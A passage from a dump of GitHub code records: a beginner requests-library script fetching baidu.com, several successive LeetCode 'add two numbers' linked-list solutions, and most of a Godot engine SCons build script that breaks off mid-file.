5\").show(truncate=False)\r\n","repo_name":"MinusOneByTwelve/MiscStuff","sub_path":"DB/Temp/misc/oldcode/FileLoader.py","file_name":"FileLoader.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"33415343171","text":"import requests\n\nresponse = requests.get(\"http://www.baidu.com\")\nstatus_code = response.status_code\nheader = response.headers\nuser_agent = response.request.headers\nprint(status_code)\nprint(header)\nprint(user_agent)\nprint(response.content.decode())\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\"}\nresponse = requests.get(\"http://www.baidu.com\",headers = headers)\nprint(response.content.decode())\nuser_agent = response.request.headers\n\nprint(user_agent)\n","repo_name":"microease/Heima-Python-2018","sub_path":"15期/18 通用爬虫模块使用/02-爬虫requests库/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"7"} +{"seq_id":"38526370129","text":"#\n# @lc app=leetcode.cn id=2 lang=python3\n#\n# [2] 两数相加\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n num1 = self.get_number(l1)\n num2 = self.get_number(l2)\n num = num1 + num2\n l3 = self.get_list_node(num)\n return l3\n\n def get_number(self, l1: ListNode) -> int:\n return int(''.join([str(i) for i in l1]))\n\n def get_list_node(self, number: int) -> ListNode:\n return [int(i) for i in str(number).split()]\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n num1 = self.get_number(l1)\n num2 = self.get_number(l2)\n num = num1 + num2\n l3 = self.get_list_node(num)\n return l3\n\n def get_number(self, alist: ListNode) -> int:\n p = alist\n nums = []\n while p:\n nums.append(str(p.val))\n p = p.next\n return int(''.join(nums[::-1]))\n\n def get_list_node(self, number: int) -> ListNode:\n number_str = str(number)[::-1]\n alist = ListNode(number_str[0])\n p = alist\n for i in number_str[1:]:\n p.next = ListNode(i)\n p = p.next\n return alist\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n node1 = l1\n node2 = l2\n plus = 0\n node = None\n while node1 and node2:\n val1 = node1.val\n val2 = node2.val\n val = val1+val2 + plus\n val, plus = self.get_val(val, plus)\n node1 = node1.next\n node2 = node2.next\n if node:\n node.next = ListNode(val)\n node = node.next\n else:\n l3 = node = ListNode(val)\n left_node = node1 or node2\n while left_node:\n val = left_node.val + plus\n val, plus = self.get_val(val, plus)\n node.next = ListNode(val)\n node = node.next\n left_node = left_node.next\n if plus:\n node.next = ListNode(plus)\n return l3\n\n def get_val(self, val, plus):\n if val >= 10:\n plus = 1\n val = str(val)[1]\n else:\n plus = 0\n return val, plus\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n plus = 0\n node = self.get_node(l1, l2, plus)\n return node\n\n def get_node(self, node1: ListNode, node2: ListNode, plus: int) -> ListNode:\n if not node1 and not node2 and not plus:\n return\n val1 = node1.val if node1 else 0\n val2 = node2.val if node2 else 0\n val = val1 + val2 + plus\n current_val = val % 10\n plus = val // 10\n node = ListNode(current_val)\n node1 = node1.next if node1 else None\n node2 = node2.next if node2 else None\n node.next = self.get_node(node1, node2, plus)\n return node\n\n\nclass Solution:\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n head = p = ListNode()\n plus = 0\n while l1 or l2 or plus:\n val1 = l1.val if l1 else 0\n val2 = l2.val if l2 else 0\n val = val1 + val2 + plus\n current_val = val % 10\n plus = val // 10\n l1 = l1.next if l1 else None\n l2 = l2.next if l2 else None\n p.next = ListNode(current_val)\n p = p.next\n return head.next\n\n\n# @lc code=end\n","repo_name":"hyram-zhang/leetcode","sub_path":"2.两数相加.py","file_name":"2.两数相加.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24377766369","text":"#!/usr/bin/env python\n\nEnsureSConsVersion(3, 0, 0)\nEnsurePythonVersion(3, 6)\n\n# System\nimport atexit\nimport glob\nimport os\nimport pickle\nimport sys\nimport time\nfrom collections import OrderedDict\n\n# Local\nimport methods\nimport glsl_builders\nimport gles3_builders\nfrom platform_methods import run_in_subprocess\n\n# Scan possible build platforms\n\nplatform_list = [] # list of platforms\nplatform_opts = {} # options for each platform\nplatform_flags = {} # flags for each platform\n\nactive_platforms = []\nactive_platform_ids = []\nplatform_exporters = []\nplatform_apis = []\n\ntime_at_start = time.time()\n\nfor x in sorted(glob.glob(\"platform/*\")):\n if not os.path.isdir(x) or not os.path.exists(x + \"/detect.py\"):\n continue\n tmppath = \"./\" + x\n\n sys.path.insert(0, tmppath)\n import detect\n\n if os.path.exists(x + \"/export/export.cpp\"):\n platform_exporters.append(x[9:])\n if os.path.exists(x + \"/api/api.cpp\"):\n platform_apis.append(x[9:])\n if detect.is_active():\n active_platforms.append(detect.get_name())\n active_platform_ids.append(x)\n if detect.can_build():\n x = x.replace(\"platform/\", \"\") # rest of world\n x = x.replace(\"platform\\\\\", \"\") # win32\n platform_list += [x]\n platform_opts[x] = detect.get_opts()\n platform_flags[x] = detect.get_flags()\n sys.path.remove(tmppath)\n sys.modules.pop(\"detect\")\n\nmethods.save_active_platforms(active_platforms, active_platform_ids)\n\ncustom_tools = [\"default\"]\n\nplatform_arg = ARGUMENTS.get(\"platform\", ARGUMENTS.get(\"p\", False))\n\nif os.name == \"nt\" and (platform_arg == \"android\" or methods.get_cmdline_bool(\"use_mingw\", False)):\n custom_tools = [\"mingw\"]\nelif platform_arg == \"javascript\":\n # Use generic POSIX build toolchain for Emscripten.\n custom_tools = [\"cc\", \"c++\", \"ar\", \"link\", \"textfile\", \"zip\"]\n\n# We let SCons build its default ENV as it includes OS-specific things which we don't\n# want to have to pull in manually.\n# Then we prepend PATH to make it take precedence, while preserving SCons' own entries.\nenv_base = Environment(tools=custom_tools)\nenv_base.PrependENVPath(\"PATH\", os.getenv(\"PATH\"))\nenv_base.PrependENVPath(\"PKG_CONFIG_PATH\", os.getenv(\"PKG_CONFIG_PATH\"))\nif \"TERM\" in os.environ: # Used for colored output.\n env_base[\"ENV\"][\"TERM\"] = os.environ[\"TERM\"]\n\nenv_base.disabled_modules = []\nenv_base.module_version_string = \"\"\nenv_base.msvc = False\n\nenv_base.__class__.disable_module = methods.disable_module\n\nenv_base.__class__.add_module_version_string = methods.add_module_version_string\n\nenv_base.__class__.add_source_files = methods.add_source_files\nenv_base.__class__.use_windows_spawn_fix = methods.use_windows_spawn_fix\n\nenv_base.__class__.add_shared_library = methods.add_shared_library\nenv_base.__class__.add_library = methods.add_library\nenv_base.__class__.add_program = methods.add_program\nenv_base.__class__.CommandNoCache = methods.CommandNoCache\nenv_base.__class__.Run = methods.Run\nenv_base.__class__.disable_warnings = methods.disable_warnings\nenv_base.__class__.force_optimization_on_debug = methods.force_optimization_on_debug\nenv_base.__class__.module_check_dependencies = methods.module_check_dependencies\n\nenv_base[\"x86_libtheora_opt_gcc\"] = False\nenv_base[\"x86_libtheora_opt_vc\"] = False\n\n# avoid issues when building with different versions of python out of the same directory\nenv_base.SConsignFile(\".sconsign{0}.dblite\".format(pickle.HIGHEST_PROTOCOL))\n\n# Build options\n\ncustoms = [\"custom.py\"]\n\nprofile = ARGUMENTS.get(\"profile\", \"\")\nif profile:\n if os.path.isfile(profile):\n customs.append(profile)\n elif os.path.isfile(profile + \".py\"):\n customs.append(profile + \".py\")\n\nopts = Variables(customs, ARGUMENTS)\n\n# Target build options\nopts.Add(\"p\", \"Platform (alias for 'platform')\", \"\")\nopts.Add(\"platform\", \"Target platform (%s)\" % (\"|\".join(platform_list),), \"\")\nopts.Add(BoolVariable(\"tools\", \"Build the tools (a.k.a. the Godot editor)\", True))\nopts.Add(EnumVariable(\"target\", \"Compilation target\", \"debug\", (\"debug\", \"release_debug\", \"release\")))\nopts.Add(\"arch\", \"Platform-dependent architecture (arm/arm64/x86/x64/mips/...)\", \"\")\nopts.Add(EnumVariable(\"bits\", \"Target platform bits\", \"default\", (\"default\", \"32\", \"64\")))\nopts.Add(EnumVariable(\"float\", \"Floating-point precision\", \"default\", (\"default\", \"32\", \"64\")))\nopts.Add(EnumVariable(\"optimize\", \"Optimization type\", \"speed\", (\"speed\", \"size\", \"none\")))\nopts.Add(BoolVariable(\"production\", \"Set defaults to build Godot for use in production\", False))\nopts.Add(BoolVariable(\"use_lto\", \"Use link-time optimization\", False))\n\n# Components\nopts.Add(BoolVariable(\"deprecated\", \"Enable deprecated features\", True))\nopts.Add(BoolVariable(\"minizip\", \"Enable ZIP archive support using minizip\", True))\nopts.Add(BoolVariable(\"xaudio2\", \"Enable the XAudio2 audio driver\", False))\nopts.Add(BoolVariable(\"vulkan\", \"Enable the vulkan video driver\", True))\nopts.Add(BoolVariable(\"opengl3\", \"Enable the OpenGL/GLES3 video driver\", True))\nopts.Add(\"custom_modules\", \"A list of comma-separated directory paths containing custom modules to build.\", \"\")\nopts.Add(BoolVariable(\"custom_modules_recursive\", \"Detect custom modules recursively for each specified path.\", True))\nopts.Add(BoolVariable(\"use_volk\", \"Use the volk library to load the Vulkan loader dynamically\", True))\n\n# Advanced options\nopts.Add(BoolVariable(\"dev\", \"If yes, alias for verbose=yes warnings=extra werror=yes\", False))\nopts.Add(BoolVariable(\"progress\", \"Show a progress indicator during compilation\", True))\nopts.Add(BoolVariable(\"tests\", \"Build the unit tests\", False))\nopts.Add(BoolVariable(\"verbose\", \"Enable verbose output for the compilation\", False))\nopts.Add(EnumVariable(\"warnings\", \"Level of compilation warnings\", \"all\", (\"extra\", \"all\", \"moderate\", \"no\")))\nopts.Add(BoolVariable(\"werror\", \"Treat compiler warnings as errors\", False))\nopts.Add(\"extra_suffix\", \"Custom extra suffix added to the base filename of all generated binary files\", \"\")\nopts.Add(BoolVariable(\"vsproj\", \"Generate a Visual Studio solution\", False))\nopts.Add(BoolVariable(\"disable_3d\", \"Disable 3D nodes for a smaller executable\", False))\nopts.Add(BoolVariable(\"disable_advanced_gui\", \"Disable advanced GUI nodes and behaviors\", False))\nopts.Add(\"disable_classes\", \"Disable given classes (comma separated)\", \"\")\nopts.Add(BoolVariable(\"modules_enabled_by_default\", \"If no, disable all modules except ones explicitly enabled\", True))\nopts.Add(BoolVariable(\"no_editor_splash\", \"Don't use the custom splash screen for the editor\", False))\nopts.Add(\"system_certs_path\", \"Use this path as SSL certificates default for editor (for package maintainers)\", \"\")\nopts.Add(BoolVariable(\"use_precise_math_checks\", \"Math checks use very precise epsilon (debug option)\", False))\n\n# Thirdparty libraries\nopts.Add(BoolVariable(\"builtin_bullet\", \"Use the built-in Bullet library\", True))\nopts.Add(BoolVariable(\"builtin_certs\", \"Use the built-in SSL certificates bundles\", True))\nopts.Add(BoolVariable(\"builtin_embree\", \"Use the built-in Embree library\", True))\nopts.Add(BoolVariable(\"builtin_enet\", \"Use the built-in ENet library\", True))\nopts.Add(BoolVariable(\"builtin_freetype\", \"Use the built-in FreeType library\", True))\nopts.Add(BoolVariable(\"builtin_msdfgen\", \"Use the built-in MSDFgen library\", True))\nopts.Add(BoolVariable(\"builtin_glslang\", \"Use the built-in glslang library\", True))\nopts.Add(BoolVariable(\"builtin_graphite\", \"Use the built-in Graphite library\", True))\nopts.Add(BoolVariable(\"builtin_harfbuzz\", \"Use the built-in HarfBuzz library\", True))\nopts.Add(BoolVariable(\"builtin_icu\", \"Use the built-in ICU library\", True))\nopts.Add(BoolVariable(\"builtin_libogg\", \"Use the built-in libogg library\", True))\nopts.Add(BoolVariable(\"builtin_libpng\", \"Use the built-in libpng library\", True))\nopts.Add(BoolVariable(\"builtin_libtheora\", \"Use the built-in libtheora library\", True))\nopts.Add(BoolVariable(\"builtin_libvorbis\", \"Use the built-in libvorbis library\", True))\nopts.Add(BoolVariable(\"builtin_libwebp\", \"Use the built-in libwebp library\", True))\nopts.Add(BoolVariable(\"builtin_wslay\", \"Use the built-in wslay library\", True))\nopts.Add(BoolVariable(\"builtin_mbedtls\", \"Use the built-in mbedTLS library\", True))\nopts.Add(BoolVariable(\"builtin_miniupnpc\", \"Use the built-in miniupnpc library\", True))\nopts.Add(BoolVariable(\"builtin_pcre2\", \"Use the built-in PCRE2 library\", True))\nopts.Add(BoolVariable(\"builtin_pcre2_with_jit\", \"Use JIT compiler for the built-in PCRE2 library\", True))\nopts.Add(BoolVariable(\"builtin_recast\", \"Use the built-in Recast library\", True))\nopts.Add(BoolVariable(\"builtin_rvo2\", \"Use the built-in RVO2 library\", True))\nopts.Add(BoolVariable(\"builtin_squish\", \"Use the built-in squish library\", True))\nopts.Add(BoolVariable(\"builtin_xatlas\", \"Use the built-in xatlas library\", True))\nopts.Add(BoolVariable(\"builtin_zlib\", \"Use the built-in zlib library\", True))\nopts.Add(BoolVariable(\"builtin_zstd\", \"Use the built-in Zstd library\", True))\n\n# Compilation environment setup\nopts.Add(\"CXX\", \"C++ compiler\")\nopts.Add(\"CC\", \"C compiler\")\nopts.Add(\"LINK\", \"Linker\")\nopts.Add(\"CCFLAGS\", \"Custom flags for both the C and C++ compilers\")\nopts.Add(\"CFLAGS\", \"Custom flags for the C compiler\")\nopts.Add(\"CXXFLAGS\", \"Custom flags for the C++ compiler\")\nopts.Add(\"LINKFLAGS\", \"Custom flags for the linker\")\n\n# Update the environment to have all above options defined\n# in following code (especially platform and custom_modules).\nopts.Update(env_base)\n\n# Platform selection: validate input, and add options.\n\nselected_platform = \"\"\n\nif env_base[\"platform\"] != \"\":\n selected_platform = env_base[\"platform\"]\nelif env_base[\"p\"] != \"\":\n selected_platform = env_base[\"p\"]\nelse:\n # Missing `platform` argument, try to detect platform automatically\n if (\n sys.platform.startswith(\"linux\")\n or sys.platform.startswith(\"dragonfly\")\n or sys.platform.startswith(\"freebsd\")\n or sys.platform.startswith(\"netbsd\")\n or sys.platform.startswith(\"openbsd\")\n ):\n selected_platform = \"linuxbsd\"\n elif sys.platform == \"darwin\":\n selected_platform = \"osx\"\n elif sys.platform == \"win32\":\n selected_platform = \"windows\"\n else:\n print(\"Could not detect platform automatically. Supported platforms:\")\n for x in platform_list:\n print(\"\\t\" + x)\n print(\"\\nPlease run SCons again and select a valid platform: platform=\")\n\n if selected_platform != \"\":\n print(\"Automatically detected platform: \" + selected_platform)\n\nif selected_platform in [\"linux\", \"bsd\", \"x11\"]:\n if selected_platform == \"x11\":\n # Deprecated alias kept for compatibility.\n print('Platform \"x11\" has been renamed to \"linuxbsd\" in Godot 4.0. Building for platform \"linuxbsd\".')\n # Alias for convenience.\n selected_platform = \"linuxbsd\"\n\n# Make sure to update this to the found, valid platform as it's used through the buildsystem as the reference.\n# It should always be re-set after calling `opts.Update()` otherwise it uses the original input value.\nenv_base[\"platform\"] = selected_platform\n\n# Add platform-specific options.\nif selected_platform in platform_opts:\n for opt in platform_opts[selected_platform]:\n opts.Add(opt)\n\n# Update the environment to take platform-specific options into account.\nopts.Update(env_base)\nenv_base[\"platform\"] = selected_platform # Must always be re-set after calling opts.Update().\n\n# Detect modules.\nmodules_detected = OrderedDict()\nmodule_search_paths = [\"modules\"] # Built-in path.\n\nif env_base[\"custom_modules\"]:\n paths = env_base[\"custom_modules\"].split(\",\")\n for p in paths:\n try:\n module_search_paths.append(methods.convert_custom_modules_path(p))\n except ValueError as e:\n print(e)\n Exit(255)\n\nfor path in module_search_paths:\n if path == \"modules\":\n # Built-in modules don't have nested modules,\n # so save the time it takes to parse directories.\n modules = methods.detect_modules(path, recursive=False)\n else: # Custom.\n modules = methods.detect_modules(path, env_base[\"custom_modules_recursive\"])\n # Provide default include path for both the custom module search `path`\n # and the base directory containing custom modules, as it may be different\n # from the built-in \"modules\" name (e.g. \"custom_modules/summator/summator.h\"),\n # so it can be referenced simply as `#include \"summator/summator.h\"`\n # independently of where a module is located on user's filesystem.\n env_base.Prepend(CPPPATH=[path, os.path.dirname(path)])\n # Note: custom modules can override built-in ones.\n modules_detected.update(modules)\n\n# Add module options.\nfor name, path in modules_detected.items():\n if env_base[\"modules_enabled_by_default\"]:\n enabled = True\n\n sys.path.insert(0, path)\n import config\n\n try:\n enabled = config.is_enabled()\n except AttributeError:\n pass\n sys.path.remove(path)\n sys.modules.pop(\"config\")\n else:\n enabled = False\n\n opts.Add(BoolVariable(\"module_\" + name + \"_enabled\", \"Enable module '%s'\" % (name,), enabled))\n\nmethods.write_modules(modules_detected)\n\n# Update the environment again after all the module options are added.\nopts.Update(env_base)\nenv_base[\"platform\"] = selected_platform # Must always be re-set after calling opts.Update().\nHelp(opts.GenerateHelpText(env_base))\n\n# add default include paths\n\nenv_base.Prepend(CPPPATH=[\"#\"])\n\n# configure ENV for platform\nenv_base.platform_exporters = platform_exporters\nenv_base.platform_apis = platform_apis\n\n# Build type defines - more platform-specific ones can be in detect.py.\nif env_base[\"target\"] == \"release_debug\" or env_base[\"target\"] == \"debug\":\n # DEBUG_ENABLED enables debugging *features* and debug-only code, which is intended\n # to give *users* extra debugging information for their game development.\n env_base.Append(CPPDEFINES=[\"DEBUG_ENABLED\"])\n\nif env_base[\"target\"] == \"debug\":\n # DEV_ENABLED enables *engine developer* code which should only be compiled for those\n # working on the engine itself.\n env_base.Append(CPPDEFINES=[\"DEV_ENABLED\"])\n\nif env_base[\"use_precise_math_checks\"]:\n env_base.Append(CPPDEFINES=[\"PRECISE_MATH_CHECKS\"])\n\nif env_base[\"no_editor_splash\"]:\n env_base.Append(CPPDEFINES=[\"NO_EDITOR_SPLASH\"])\n\nif not env_base[\"deprecated\"]:\n env_base.Append(CPPDEFINES=[\"DISABLE_DEPRECATED\"])\n\nif env_base[\"float\"] == \"64\":\n env_base.Append(CPPDEFINES=[\"REAL_T_IS_DOUBLE\"])\n\nif selected_platform in platform_list:\n tmppath = \"./platform/\" + selected_platform\n sys.path.insert(0, tmppath)\n import detect\n\n if \"create\" in dir(detect):\n env = detect.create(env_base)\n else:\n env = env_base.Clone()\n\n # Generating the compilation DB (`compile_commands.json`) requires SCons 4.0.0 or later.\n from SCons import __version__ as scons_raw_version\n\n scons_ver = env._get_major_minor_revision(scons_raw_version)\n\n if scons_ver >= (4, 0, 0):\n env.Tool(\"compilation_db\")\n env.Alias(\"compiledb\", env.CompilationDatabase())\n\n # 'dev' and 'production' are aliases to set default options if they haven't been set\n # manually by the user.\n if env[\"dev\"]:\n env[\"verbose\"] = methods.get_cmdline_bool(\"verbose\", True)\n env[\"warnings\"] = ARGUMENTS.get(\"warnings\", \"extra\")\n env[\"werror\"] = methods.get_cmdline_bool(\"werror\", True)\n if env[\"tools\"]:\n env[\"tests\"] = methods.get_cmdline_bool(\"tests\", True)\n if env[\"production\"]:\n env[\"use_static_cpp\"] = methods.get_cmdline_bool(\"use_static_cpp\", True)\n env[\"use_lto\"] = methods.get_cmdline_bool(\"use_lto\", True)\n env[\"debug_symbols\"] = methods.get_cmdline_bool(\"debug_symbols\", False)\n if not env[\"tools\"] and env[\"target\"] == \"debug\":\n print(\n \"WARNING: Requested `production` build with `tools=no target=debug`, \"\n \"this will give you a full debug template (use `target=release_debug` \"\n \"for an optimized template with debug features).\"\n )\n if env.msvc:\n print(\n \"WARNING: For `production` Windows builds, you should use MinGW with GCC \"\n \"or Clang instead of Visual Studio, as they can better optimize the \"\n \"GDScript VM in a very significant way. MSVC LTO also doesn't work \"\n \"reliably for our use case.\"\n \"If you want to use MSVC nevertheless for production builds, set \"\n \"`debug_symbols=no use_lto=no` instead of the `production=yes` option.\"\n )\n Exit(255)\n\n env.extra_suffix = \"\"\n\n if env[\"extra_suffix\"] != \"\":\n env.extra_suffix += \".\" + env[\"extra_suffix\"]\n\n # Environment flags\n CCFLAGS = env.get(\"CCFLAGS\", \"\")\n env[\"CCFLAGS\"] = \"\"\n env.Append(CCFLAGS=str(CCFLAGS).split())\n\n CFLAGS = env.get(\"CFLAGS\", \"\")\n env[\"CFLAGS\"] = \"\"\n env.Append(CFLAGS=str(CFLAGS).split())\n\n CXXFLAGS = env.get(\"CXXFLAGS\", \"\")\n env[\"CXXFLAGS\"] = \"\"\n env.Append(CXXFLAGS=str(CXXFLAGS).split())\n\n LINKFLAGS = env.get(\"LINKFLAGS\", \"\")\n env[\"LINKFLAGS\"] = \"\"\n env.Append(LINKFLAGS=str(LINKFLAGS).split())\n\n # Platform specific flags\n flag_list = platform_flags[selected_platform]\n for f in flag_list:\n if not (f[0] in ARGUMENTS): # allow command line to override platform flags\n env[f[0]] = f[1]\n\n # Must happen after the flags' definition, so that they can be used by platform detect\n detect.configure(env)\n\n # Set our C and C++ standard requirements.\n # C++17 is required as we need guaranteed copy elision as per GH-36436.\n # Prepending to make it possible to override.\n # This needs to come after `configure`, otherwise we don't have env.msvc.\n if not env.msvc:\n # Specifying GNU extensions support explicitly, which are supported by\n # both GCC and Clang. Both currently default to gnu11 and gnu++14.\n env.Prepend(CFLAGS=[\"-std=gnu11\"])\n env.Prepend(CXXFLAGS=[\"-std=gnu++17\"])\n else:\n # MSVC doesn't have clear C standard support, /std only covers C++.\n # We apply it to CCFLAGS (both C and C++ code) in case it impacts C features.\n env.Prepend(CCFLAGS=[\"/std:c++17\"])\n\n # Enforce our minimal compiler version requirements\n cc_version = methods.get_compiler_version(env) or {\n \"major\": None,\n \"minor\": None,\n \"patch\": None,\n \"metadata1\": None,\n \"metadata2\": None,\n \"date\": None,\n }\n cc_version_major = int(cc_version[\"major\"] or -1)\n cc_version_minor = int(cc_version[\"minor\"] or -1)\n cc_version_metadata1 = cc_version[\"metadata1\"] or \"\"\n\n if methods.using_gcc(env):\n if cc_version_major == -1:\n print(\n \"Couldn't detect compiler version, skipping version checks. \"\n \"Build may fail if the compiler doesn't support C++17 fully.\"\n )\n # GCC 8 before 8.4 has a regression in the support of guaranteed copy elision\n # which causes a build failure: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=86521\n elif cc_version_major == 8 and cc_version_minor < 4:\n print(\n \"Detected GCC 8 version < 8.4, which is not supported due to a \"\n \"regression in its C++17 guaranteed copy elision support. Use a \"\n 'newer GCC version, or Clang 6 or later by passing \"use_llvm=yes\" '\n \"to the SCons command line.\"\n )\n Exit(255)\n elif cc_version_major < 7:\n print(\n \"Detected GCC version older than 7, which does not fully support \"\n \"C++17. Supported versions are GCC 7, 9 and later. Use a newer GCC \"\n 'version, or Clang 6 or later by passing \"use_llvm=yes\" to the '\n \"SCons command line.\"\n )\n Exit(255)\n elif cc_version_metadata1 == \"win32\":\n print(\n \"Detected mingw version is not using posix threads. Only posix \"\n \"version of mingw is supported. \"\n 'Use \"update-alternatives --config -w64-mingw32-[gcc|g++]\" '\n \"to switch to posix threads.\"\n )\n Exit(255)\n elif methods.using_clang(env):\n if cc_version_major == -1:\n print(\n \"Couldn't detect compiler version, skipping version checks. \"\n \"Build may fail if the compiler doesn't support C++17 fully.\"\n )\n # Apple LLVM versions differ from upstream LLVM version \\o/, compare\n # in https://en.wikipedia.org/wiki/Xcode#Toolchain_versions\n elif env[\"platform\"] == \"osx\" or env[\"platform\"] == \"iphone\":\n vanilla = methods.is_vanilla_clang(env)\n if vanilla and cc_version_major < 6:\n print(\n \"Detected Clang version older than 6, which does not fully support \"\n \"C++17. Supported versions are Clang 6 and later.\"\n )\n Exit(255)\n elif not vanilla and cc_version_major < 10:\n print(\n \"Detected Apple Clang version older than 10, which does not fully \"\n \"support C++17. Supported versions are Apple Clang 10 and later.\"\n )\n Exit(255)\n elif cc_version_major < 6:\n print(\n \"Detected Clang version older than 6, which does not fully support \"\n \"C++17. Supported versions are Clang 6 and later.\"\n )\n Exit(255)\n\n # Configure compiler warnings\n if env.msvc: # MSVC\n # Truncations, narrowing conversions, signed/unsigned comparisons...\n disable_nonessential_warnings = [\"/wd4267\", \"/wd4244\", \"/wd4305\", \"/wd4018\", \"/wd4800\"]\n if env[\"warnings\"] == \"extra\":\n env.Append(CCFLAGS=[\"/Wall\"]) # Implies /W4\n elif env[\"warnings\"] == \"all\":\n env.Append(CCFLAGS=[\"/W3\"] + disable_nonessential_warnings)\n elif env[\"warnings\"] == \"moderate\":\n env.Append(CCFLAGS=[\"/W2\"] + disable_nonessential_warnings)\n else: # 'no'\n env.Append(CCFLAGS=[\"/w\"])\n # Set exception handling model to avoid warnings caused by Windows system headers.\n env.Append(CCFLAGS=[\"/EHsc\"])\n\n if env[\"werror\"]:\n env.Append(CCFLAGS=[\"/WX\"])\n else: # GCC, Clang\n common_warnings = []\n\n if methods.using_gcc(env):\n common_warnings += [\"-Wshadow-local\", \"-Wno-misleading-indentation\"]\n elif methods.using_clang(env) or methods.using_emcc(env):\n # We often implement `operator<` for structs of pointers as a requirement\n # for putting them in `Set` or `Map`. We don't mind about unreliable ordering.\n common_warnings += [\"-Wno-ordered-compare-function-pointers\"]\n\n if env[\"warnings\"] == \"extra\":\n env.Append(CCFLAGS=[\"-Wall\", \"-Wextra\", \"-Wwrite-strings\", \"-Wno-unused-parameter\"] + common_warnings)\n env.Append(CXXFLAGS=[\"-Wctor-dtor-privacy\", \"-Wnon-virtual-dtor\"])\n if methods.using_gcc(env):\n env.Append(\n CCFLAGS=[\n \"-Walloc-zero\",\n \"-Wduplicated-branches\",\n \"-Wduplicated-cond\",\n \"-Wstringop-overflow=4\",\n \"-Wlogical-op\",\n ]\n )\n # -Wnoexcept was removed temporarily due to GH-36325.\n env.Append(CXXFLAGS=[\"-Wplacement-new=1\"])\n if cc_version_major >= 9:\n env.Append(CCFLAGS=[\"-Wattribute-alias=2\"])\n elif methods.using_clang(env) or methods.using_emcc(env):\n env.Append(CCFLAGS=[\"-Wimplicit-fallthrough\"])\n elif env[\"warnings\"] == \"all\":\n env.Append(CCFLAGS=[\"-Wall\"] + common_warnings)\n elif env[\"warnings\"] == \"moderate\":\n env.Append(CCFLAGS=[\"-Wall\", \"-Wno-unused\"] + common_warnings)\n else: # 'no'\n env.Append(CCFLAGS=[\"-w\"])\n\n if env[\"werror\"]:\n env.Append(CCFLAGS=[\"-Werror\"])\n # FIXME: Temporary workaround after the Vulkan merge, remove once warnings are fixed.\n if methods.using_gcc(env):\n env.Append(CXXFLAGS=[\"-Wno-error=cpp\"])\n if cc_version_major == 7: # Bogus warning fixed in 8+.\n env.Append(CCFLAGS=[\"-Wno-error=strict-overflow\"])\n elif methods.using_clang(env) or methods.using_emcc(env):\n env.Append(CXXFLAGS=[\"-Wno-error=#warnings\"])\n else: # always enable those errors\n env.Append(CCFLAGS=[\"-Werror=return-type\"])\n\n if hasattr(detect, \"get_program_suffix\"):\n suffix = \".\" + detect.get_program_suffix()\n else:\n suffix = \".\" + selected_platform\n\n if env_base[\"float\"] == \"64\":\n suffix += \".double\"\n\n if env[\"target\"] == \"release\":\n if env[\"tools\"]:\n print(\"Error: The editor can only be built with `target=debug` or `target=release_debug`.\")\n Exit(255)\n suffix += \".opt\"\n env.Append(CPPDEFINES=[\"NDEBUG\"])\n elif env[\"target\"] == \"release_debug\":\n if env[\"tools\"]:\n suffix += \".opt.tools\"\n else:\n suffix += \".opt.debug\"\n else:\n if env[\"tools\"]:\n print(\n \"Note: Building a debug binary (which will run slowly). Use `target=release_debug` to build an optimized release binary.\"\n )\n suffix += \".tools\"\n else:\n print(\n \"Note: Building a debug binary (which will run slowly). Use `target=release` to build an optimized release binary.\"\n )\n suffix += \".debug\"\n\n if env[\"arch\"] != \"\":\n suffix += \".\" + env[\"arch\"]\n elif env[\"bits\"] == \"32\":\n suffix += \".32\"\n elif env[\"bits\"] == \"64\":\n suffix += \".64\"\n\n suffix += env.extra_suffix\n\n sys.path.remove(tmppath)\n sys.modules.pop(\"detect\")\n\n modules_enabled = OrderedDict()\n env.module_icons_paths = []\n env.doc_class_path = {}\n\n for name, path in modules_detected.items():\n if not env[\"module_\" + name + \"_enabled\"]:\n continue\n sys.path.insert(0, path)\n env.current_module = name\n import config\n\n if config.can_build(env, selected_platform):\n config.configure(env)\n # Get doc classes paths (if present)\n try:\n doc_classes = config.get_doc_classes()\n doc_path = config.get_doc_path()\n for c in doc_classes:\n env.doc_class_path[c] = path + \"/\" + doc_path\n except Exception:\n pass\n # Get icon paths (if present)\n try:\n icons_path = config.get_icons_path()\n env.module_icons_paths.append(path + \"/\" + icons_path)\n except Exception:\n # Default path for module icons\n env.module_icons_paths.append(path + \"/\" + \"icons\")\n modules_enabled[name] = path\n\n sys.path.remove(path)\n sys.modules.pop(\"config\")\n\n env.module_list = modules_enabled\n\n methods.update_version(env.module_version_string)\n\n env[\"PROGSUFFIX\"] = suffix + env.module_version_string + env[\"PROGSUFFIX\"]\n env[\"OBJSUFFIX\"] = suffix + env[\"OBJSUFFIX\"]\n # (SH)LIBSUFFIX will be used for our own built libraries\n # LIBSUFFIXES contains LIBSUFFIX and SHLIBSUFFIX by default,\n # so we need to append the default suffixes to keep the ability\n # to link against thirdparty libraries (.a, .so, .lib, etc.).\n if os.name == \"nt\":\n # On Windows, only static libraries and import libraries can be\n # statically linked - both using .lib extension\n env[\"LIBSUFFIXES\"] += [env[\"LIBSUFFIX\"]]\n else:\n env[\"LIBSUFFIXES\"] += [env[\"LIBSUFFIX\"], env[\"SHLIBSUFFIX\"]]\n env[\"LIBSUFFIX\"] = suffix + env[\"LIBSUFFIX\"]\n env[\"SHLIBSUFFIX\"] = suffix + env[\"SHLIBSUFFIX\"]\n\n if env[\"tools\"]:\n 